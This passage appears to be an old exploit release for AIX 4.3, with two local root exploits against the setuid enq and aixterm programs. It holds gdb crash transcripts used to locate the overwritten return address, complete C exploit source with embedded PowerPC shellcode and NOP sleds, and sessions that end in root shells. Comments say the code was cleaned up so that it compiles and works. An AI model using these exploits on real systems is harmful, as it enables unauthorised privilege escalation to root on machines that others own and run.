This GDB was configured as "powerpc-ibm-aix4.3.3.0"...(no debugging
symbols found)...
(gdb) r -M `perl -e 'print "abcd"x700'`
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x700'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...enq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcenq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcda
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Program received signal SIGSEGV, Segmentation fault.
0x62636460 in ?? () from (unknown load module)
(gdb) r -M `perl -e 'print "abcd"x5000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x5000'`
Program received signal SIGSEGV, Segmentation fault.
0xd018a654 in getenv ()
(gdb) q
[green@aix test]$ id
uid=205(green) gid=1(staff)
[green@aix test]$ ./aix_enq
enq: (WARNING): Can't open message
file //////////////////////////////////////////////////enq: (WARNING):
Can't open message
file /////////////////////////////////////////////////////?
enq: errno = 86: File name too long
# id
uid=205(green) gid=1(staff) euid=0(root) egid=9(printq)
#
exploited by green.
*/
#define ADRNUM 3000      /* bytes of the repeated 4-byte address guess placed in the -M argument */
#define NOPNUM 16000     /* bytes of the 4-byte `nop` written ahead of the shellcode in the egg */
#define ADR_ALLIGN 0     /* extra leading address bytes: shifts where the 4-byte pattern falls */
#define ALLIGN 0         /* spaces inserted after "xxx=" before the nop run */
/*
 * Payload appended after the NOP run inside the "xxx=" environment variable:
 * 76 bytes of PowerPC machine code followed by the literal "/bin/sh".
 * None of the bytes is 0x00, so strlen() measures the whole thing.
 * The name suggests a setreuid()+shell stub, and the transcript above does
 * end in an euid=0 shell, but the instruction stream is not annotated here --
 * treat that reading as unverified.
 */
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
/* Four-byte filler repeated NOPNUM times ahead of the shellcode.
 * 0x7ffffb78 decodes to the PowerPC instruction `or r31,r31,r31`, which
 * changes no state; the trailing 0 is only the string terminator. */
char nop[]={0x7f,0xff,0xfb,0x78,0};
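/*
 * Entry point of the enq exploit.
 *
 * Builds two attacker-controlled strings and then replaces this process with
 * the set-uid /usr/bin/enq via execle():
 *
 *   -M argument : ADR_ALLIGN + ADRNUM bytes made of the guessed 4-byte
 *                 address repeated back to back.  ADR_ALLIGN leading bytes
 *                 shift the pattern so the address lands aligned on the
 *                 overwritten return-address slot (the gdb runs above crash
 *                 at a slice of the "abcd" pattern, which is how that offset
 *                 was worked out).
 *   environment : a single variable "xxx=" followed by ALLIGN spaces,
 *                 NOPNUM bytes of `nop` and then `setreuidcode`.
 *
 * The address guess is the lsd-pl.net AIX idiom: walk this process's own
 * environment to estimate where the strings end above the envp array, then
 * back off 8000 bytes so that, in the exec'd child, the guess falls inside
 * the ~16 KB NOP run that the lone "xxx=" variable occupies near the top of
 * the stack.  Nothing can verify the guess before the exec; if it is off,
 * enq just crashes.
 *
 * Fix relative to the original: `buffer` was declared as 3000 bytes but the
 * loops below write ADR_ALLIGN + ADRNUM bytes (3000 with these defaults)
 * and then a terminating NUL, i.e. one byte past the end.  Both payload
 * arrays are now sized from the macros that drive the loops.
 *
 * argc/argv are unused.  `e` is the process environment (a non-standard
 * third main() parameter; it receives the environment pointer on AIX).
 * Returns 1 only if execle() fails; on success it never returns.
 */
int main(int argc,char **argv,char **e){
    /* +1 for the NUL that terminates the -M argument. */
    char buffer[ADR_ALLIGN+ADRNUM+1];
    /* "xxx=" + ALLIGN spaces + NOP run + shellcode; sizeof counts the NUL. */
    char egg[4+ALLIGN+NOPNUM+sizeof setreuidcode];
    /* Holds one unsigned long; on the ILP32 AIX 4.3 target that is the 4
     * bytes the loops below repeat.  Sized from the type so an LP64 build
     * cannot write past it. */
    char adr[sizeof(unsigned long)];
    char *b,*envp[2];
    int i;

    (void)argc;
    (void)argv;

    /*
     * NOTE(review): because of the post-increment, each iteration measures
     * the *next* environment string, and the last iteration calls strlen()
     * on the NULL terminator.  That presumably only survives because 32-bit
     * AIX maps page 0 readable -- confirm before porting; it would segfault
     * on most other systems.  Kept verbatim so the estimate stays the one
     * the exploit was tuned against; only (i & ~3) is used.
     */
    i=0; while(*e++) i+=strlen(*e)+1;
    *((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;

    /* Only one variable is passed, so the egg sits at a predictable spot. */
    envp[0]=egg;
    envp[1]=0;

    /* -M argument: ADR_ALLIGN shift bytes, then ADRNUM bytes of the guess. */
    b=buffer;
    for(i=0;i<ADR_ALLIGN;i++) *b++=adr[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    /* Egg: "xxx=" | ALLIGN spaces | NOP run | shellcode. */
    b=egg;
    sprintf(b,"xxx=");b+=4;
    for(i=0; i<ALLIGN;i++) *b++=' ';
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    *b=0;

    execle("/usr/bin/enq", "enq", "-M", buffer, (char *)0, envp);
    return 1;   /* execle() only returns on failure */
}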
------------------------------------------------------------------------
---
--------------------------------
2. /usr/bin/X11/aixterm
/*
[dragory@aix dragory]$ cp /usr/bin/X11/aixterm ./test
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im `perl -
e 'print "x"x400'`
Segmentation fault (core dumped)
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x78787878 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im a`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x63646160 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im ab`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x62636460 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im abc`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x61626364 in ?? () from (unknown load module)
(gdb) q
// => ADR_ALLIGN = 3: only with a 3-byte prefix does the crash address become
//    an aligned "abcd" (0x61626364 above), so the repeated address must be
//    shifted by 3 bytes to land squarely on the overwritten return address.
[dragory@aix dragory]$ uname
AIX
[dragory@aix dragory]$ ls -l /usr/bin/X11/aixterm
-rwsr-xr-x 1 root system 376096 7월 20 1999 /usr/bin/X11/aixterm
[dragory@aix dragory]$ id
uid=218(dragory) gid=1(staff)
[dragory@aix dragory]$ gcc -o aixterm_exp aixterm_exp.c
[dragory@aix dragory]$ ./aixterm_exp -d X.X.X.X:0
# id
uid=218(dragory) gid=1(staff) euid=0(root)
#
The vulnerability was discovered by Euan Briggs.
exploited by dragory.
*/
// Based on the enq exploit above, originally written by green.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define ADRNUM 1000      /* bytes of the repeated 4-byte address guess placed in the -im argument */
#define NOPNUM 16000     /* bytes of the 4-byte `nop` written ahead of the shellcode in the egg */
#define ADR_ALLIGN 3     /* default leading address bytes (see the gdb runs above); -a overrides */
#define ALLIGN 0         /* default spaces after "xxx=" before the nop run; -A overrides */
#define HOST_IP "1.1.1.1:0"   /* default X display handed to aixterm -display; -d overrides */
/*
 * Payload appended after the NOP run inside the "xxx=" environment variable:
 * 76 bytes of PowerPC machine code followed by the literal "/bin/sh".
 * None of the bytes is 0x00, so strlen() measures the whole thing.
 * The name suggests a setreuid()+shell stub, and the transcript above does
 * end in an euid=0 shell, but the instruction stream is not annotated here --
 * treat that reading as unverified.
 */
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
// This shellcode is the one used for AIX 4.3.x; other releases may need a different stub.
/* Four-byte filler repeated NOPNUM times ahead of the shellcode.
 * 0x7ffffb78 decodes to the PowerPC instruction `or r31,r31,r31`, which
 * changes no state; the trailing 0 is only the string terminator. */
char nop[]={0x7f,0xff,0xfb,0x78,0};
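int usage(char *arg);

/*
 * Entry point of the aixterm exploit.
 *
 * Options:
 *   -d HOST:DISPLAY   X display aixterm should connect to (default HOST_IP)
 *   -a N              ADR_ALLIGN override: leading address bytes (default 3)
 *   -A N              ALLIGN override: spaces before the NOP run (default 0)
 *
 * Payload layout is the same as in the enq exploit above: the -im argument
 * is adr_allign + ADRNUM bytes of the guessed address repeated, and the
 * single environment variable "xxx=" carries allign spaces, NOPNUM bytes of
 * `nop` and then `setreuidcode`.  The gdb runs above show why the default
 * shift is 3: only with a 3-byte prefix does the crash address become an
 * aligned "abcd" (0x61626364).
 *
 * Fixes relative to the original:
 *   - -d used strcpy() into a 10-byte array sized from "1.1.1.1:0", so any
 *     realistic "a.b.c.d:0" overflowed the exploit's own stack.  The option
 *     now just points at optarg.
 *   - -a / -A were fed to fixed-size arrays unchecked; they are now
 *     range-checked against sizeof buffer / sizeof egg before use.
 *   - the stray "pl.net" token left behind by a line-wrapped URL comment
 *     (which stopped the listing from compiling) is gone.
 *
 * `e` is the process environment (a non-standard third main() parameter;
 * it receives the environment pointer on AIX), used for the lsd-pl.net-style
 * address estimate.
 * Returns 0 after printing usage, 1 on a bad option value or a failed exec;
 * does not return when execle() succeeds.
 */
int main(int argc,char **argv,char **e) {
    char buffer[3000],egg[20000],*b,*envp[2];
    /* Holds one unsigned long; on the ILP32 AIX 4.3 target that is the 4
     * bytes the loops below repeat.  Sized from the type so an LP64 build
     * cannot write past it. */
    char adr[sizeof(unsigned long)];
    const char *host_ip = HOST_IP;
    int i, opt, adr_allign = ADR_ALLIGN, allign = ALLIGN;
    int max_adr_allign, max_allign;

    if(argc < 2) {
        usage(argv[0]);
        exit(0);
    }
    while((opt = getopt(argc, argv, "d:a:A:")) != -1) {
        switch(opt) {
        case 'd':
            host_ip = optarg;   /* argv storage outlives us: no copy needed */
            break;
        case 'a':
            adr_allign = atoi(optarg);
            break;
        case 'A':
            allign = atoi(optarg);
            break;
        case '?':
        default:
            usage(argv[0]);
            exit(0);
        }
    }

    /* Keep both payloads (plus their terminating NUL) inside their arrays. */
    max_adr_allign = (int)sizeof buffer - ADRNUM - 1;
    if (adr_allign < 0 || adr_allign > max_adr_allign) {
        fprintf(stderr, "ADR_ALLIGN must be between 0 and %d\n", max_adr_allign);
        exit(1);
    }
    max_allign = (int)(sizeof egg - 4 - NOPNUM - strlen(setreuidcode) - 1);
    if (allign < 0 || allign > max_allign) {
        fprintf(stderr, "ALLIGN must be between 0 and %d\n", max_allign);
        exit(1);
    }

    /*
     * Address estimate (http://lsd-pl.net).  NOTE(review): because of the
     * post-increment, each iteration measures the *next* environment string
     * and the last iteration calls strlen() on the NULL terminator.  That
     * presumably only survives because 32-bit AIX maps page 0 readable --
     * confirm before porting; it would segfault on most other systems.
     * Kept verbatim so the estimate stays the one the exploit was tuned
     * against; only (i & ~3) is used.
     */
    i=0; while(*e++) i+=strlen(*e)+1;
    *((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;

    /* Only one variable is passed, so the egg sits at a predictable spot. */
    envp[0]=egg;
    envp[1]=0;

    /* -im argument: adr_allign shift bytes, then ADRNUM bytes of the guess. */
    b=buffer;
    for(i=0;i<adr_allign;i++) *b++=adr[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    /* Egg: "xxx=" | allign spaces | NOP run | shellcode. */
    b=egg;
    sprintf(b,"xxx=");b+=4;
    for(i=0; i<allign;i++) *b++=' ';
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    *b=0;

    execle("/usr/bin/X11/aixterm", "aixterm", "-display", host_ip, "-im",
           buffer, (char *)0, envp);
    perror("execle");   /* only reached when the exec fails */
    return 1;
}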
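/*
 * Print the command-line help for the aixterm exploit on stdout.
 * `arg` is argv[0], echoed in the usage line.  Returns 0 (callers ignore it).
 * Fix relative to the original: the two string literals had been broken
 * across lines by mail wrapping and would not compile; they are rejoined.
 */
int usage(char *arg) {
    printf("Usage : %s -d [Your X Server IP:0] -a [ADR_ALLIGN] -A [ALLIGN]\n", arg);
    printf("Default : [Your X Server IP:0]=1.1.1.1:0 ADR_ALLIGN=3 ALLIGN=0\n");
    printf("If not exploited, you may modify ALLIGN, Your X Server IP\n");
    return 0;
}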